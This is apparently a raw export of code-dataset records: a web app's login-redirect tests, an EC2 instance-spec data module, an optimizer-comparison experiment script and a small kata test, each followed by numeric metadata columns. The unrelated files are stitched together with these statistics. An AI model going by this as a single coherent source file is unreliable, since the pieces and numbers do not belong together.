resp = unauthorized_app.get('/record/stop')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_mangohud_save_config(unauthorized_app):
resp = unauthorized_app.post('/system/mangohud/save_config')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_mangohud_edit_config(unauthorized_app):
resp = unauthorized_app.get('/system/mangohud/edit_config')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_retroarch_load_state(unauthorized_app):
resp = unauthorized_app.get('/actions/retroarch/load_state')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_retroarch_save_state(unauthorized_app):
resp = unauthorized_app.get('/actions/retroarch/save_state')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_virtual_keyboard(unauthorized_app):
resp = unauthorized_app.get('/virtual_keyboard')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_virtual_keyboard_string(unauthorized_app):
resp = unauthorized_app.post('/virtual_keyboard/string')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_reboot_system(unauthorized_app):
resp = unauthorized_app.get('/actions/reboot')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_poweroff(unauthorized_app):
resp = unauthorized_app.get('/actions/poweroff')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_suspend(unauthorized_app):
resp = unauthorized_app.get('/actions/suspend')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_toggle_mute(unauthorized_app):
resp = unauthorized_app.get('/actions/audio/toggle_mute')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_volume_up(unauthorized_app):
resp = unauthorized_app.get('/actions/audio/volume_up')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_volume_down(unauthorized_app):
resp = unauthorized_app.get('/actions/audio/volume_down')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_audio_profile(unauthorized_app):
resp = unauthorized_app.get('/audio/profile')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
| 34.608187
| 73
| 0.719922
| 1,470
| 11,836
| 5.588435
| 0.082313
| 0.188071
| 0.115642
| 0.121729
| 0.863055
| 0.841996
| 0.813025
| 0.717955
| 0.640414
| 0.612903
| 0
| 0.026457
| 0.134589
| 11,836
| 341
| 74
| 34.709677
| 0.775554
| 0.005492
| 0
| 0.478448
| 0
| 0
| 0.238168
| 0.066191
| 0
| 0
| 0
| 0
| 0.435345
| 1
| 0.228448
| false
| 0
| 0.038793
| 0
| 0.267241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9caf7caf98b76ae2503cb7895b275dad2abe395b
| 14,729
|
py
|
Python
|
ec2_compare/internal/instance_type/a.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/instance_type/a.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/instance_type/a.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 300, 'BaselineThroughputInMBps': 37.5, 'BaselineIops': 2500, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.medium', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 300, 'BaselineThroughputInMBps': 37.5, 'BaselineIops': 2500, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 525, 'BaselineThroughputInMBps': 65.625, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': 
['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 525, 'BaselineThroughputInMBps': 65.625, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 800, 'BaselineThroughputInMBps': 100.0, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 800, 'BaselineThroughputInMBps': 100.0, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 
'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1750, 'BaselineThroughputInMBps': 218.75, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1750, 'BaselineThroughputInMBps': 218.75, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 
'a1.4xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.metal', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 
'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}] # noqa: E501
def get_instances_list() -> list:
'''Return the list of EC2 instances whose InstanceType belongs to the "a" family.'''
# pylint: disable=all
return get
| 1,227.416667
| 14,540
| 0.75219
| 1,097
| 14,729
| 10.097539
| 0.113036
| 0.043333
| 0.047666
| 0.052
| 0.97084
| 0.97084
| 0.938973
| 0.938973
| 0.938973
| 0.925973
| 0
| 0.047441
| 0.072646
| 14,729
| 11
| 14,541
| 1,339
| 0.763526
| 0.008555
| 0
| 0
| 1
| 0
| 0.692181
| 0.323169
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 13
|
9cbf3b14921cb332eefbf85aff4f3fe6463232d9
| 5,446
|
py
|
Python
|
Logistic_Regression/run.py
|
htt-trangtran/smg
|
b7a49055e7d48ec456bac67ab473db2183d2f597
|
[
"MIT"
] | 1
|
2021-11-25T05:57:13.000Z
|
2021-11-25T05:57:13.000Z
|
Logistic_Regression/run.py
|
htt-trangtran/smg
|
b7a49055e7d48ec456bac67ab473db2183d2f597
|
[
"MIT"
] | null | null | null |
Logistic_Regression/run.py
|
htt-trangtran/smg
|
b7a49055e7d48ec456bac67ab473db2183d2f597
|
[
"MIT"
] | 1
|
2021-11-25T05:35:21.000Z
|
2021-11-25T05:35:21.000Z
|
############################
# written by Trang H. Tran and Lam M. Nguyen
############################
"""
Run the experiments
"""
import os
import numpy as np
import pandas as pd
from load_data import *
from algorithms import *
from record_history import *
from util_func import *
from schedule_LR import *
from train_data import *
from average_and_plot import *
# Change the record path
record_path = './SMG_record/'
record_avg_path = record_path + 'Avg/'
if not os.path.exists(record_path):
os.makedirs(record_path)
if not os.path.exists(record_avg_path):
os.makedirs(record_avg_path)
# Experiment 1: Comparing SMG with Other Methods -------------------------------
namelr = 'const_'
num_epoch = [200, 10] # Run for 200 epochs, and measure the performance every 10 epochs
# Data: w8a --------------------------------------------------------------------
dataname = 'w8a'
listrecord = []
namealg = '_SMG_'
params = [[0.5, 0.4, 0.2, 0.1, 0.08, 0.06, 0.05], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_SGD_'
params = [[0.5, 0.4, 0.2], [0], [0]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_SGDM_'
params = [[0.05, 0.04, 0.02, 0.01, 0.008, 0.006, 0.005], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_ADAM_'
params = [[0.002, 0.001, 0.0005], [0], [0]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Data: ijcnn1 ----------------------------------------------------------------
dataname = 'ijcnn1'
listrecord = []
namealg = '_SMG_'
params = [[0.5, 0.4, 0.2, 0.1, 0.08, 0.06, 0.05], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_SGD_'
params = [[0.5, 0.4, 0.2], [0], [0]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_SGDM_'
params = [[0.05, 0.04, 0.02, 0.01, 0.008, 0.006, 0.005], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_ADAM_'
params = [[0.002, 0.001, 0.0005], [0], [0]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Experiment 2: Comparing hyper-parameters for SMG -----------------------------
namelr = 'const_'
namealg = '_SMG_'
num_epoch = [200, 10]
# Data: w8a --------------------------------------------------------------------
dataname = 'w8a'
listrecord = []
params = [[0.2, 0.1, 0.05], [0], [0.1, 0.2, 0.3, 0.4, 0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Data: ijcnn1 ----------------------------------------------------------------
dataname = 'ijcnn1'
listrecord = []
params = [[0.2, 0.1, 0.05], [0], [0.1, 0.2, 0.3, 0.4, 0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Experiment 3: Comparing learning rate schemes for SMG ------------------------
namealg = '_SMG_'
num_epoch = [200, 10]
# Data: w8a --------------------------------------------------------------------
dataname = 'w8a'
listrecord = []
namelr = 'const_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'cos_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [num_epoch[0]], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'exp_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [0.99, 0.995, 0.999], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'dim_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [1, 2, 4, 8], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Data: ijcnn1 ----------------------------------------------------------------
dataname = 'ijcnn1'
listrecord = []
namelr = 'const_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'cos_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [num_epoch[0]], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'exp_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [0.99, 0.995, 0.999], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'dim_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [1, 2, 4, 8], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
| 36.066225
| 96
| 0.604848
| 793
| 5,446
| 3.981084
| 0.119798
| 0.091859
| 0.114032
| 0.152043
| 0.829268
| 0.823567
| 0.808996
| 0.808996
| 0.808996
| 0.808996
| 0
| 0.085653
| 0.148917
| 5,446
| 150
| 97
| 36.306667
| 0.595469
| 0.157547
| 0
| 0.827957
| 0
| 0
| 0.033471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.107527
| 0
| 0.107527
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
142debd67ae9255e7b90de6ef0c907971121d255
| 164
|
py
|
Python
|
Codewars/8kyu/grasshopper-terminal-game-combat-function-1/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/8kyu/grasshopper-terminal-game-combat-function-1/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/8kyu/grasshopper-terminal-game-combat-function-1/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
test.describe('Basic Tests')
test.assert_equals(combat(100, 5), 95)
test.assert_equals(combat(83, 16), 67)
test.assert_equals(combat(20, 30), 0)
| 20.5
| 38
| 0.713415
| 29
| 164
| 3.931034
| 0.655172
| 0.263158
| 0.421053
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136054
| 0.103659
| 164
| 7
| 39
| 23.428571
| 0.639456
| 0.085366
| 0
| 0
| 0
| 0
| 0.074324
| 0
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
146c88161cb654660b455331203bdcb441d81a79
| 3,971
|
py
|
Python
|
asent/data_classes.py
|
EmilStenstrom/asent
|
88a5843770d21dae20da8c09fdbd4991ee8a15c1
|
[
"MIT"
] | 4
|
2021-12-05T13:45:14.000Z
|
2022-02-10T07:17:59.000Z
|
asent/data_classes.py
|
EmilStenstrom/asent
|
88a5843770d21dae20da8c09fdbd4991ee8a15c1
|
[
"MIT"
] | 22
|
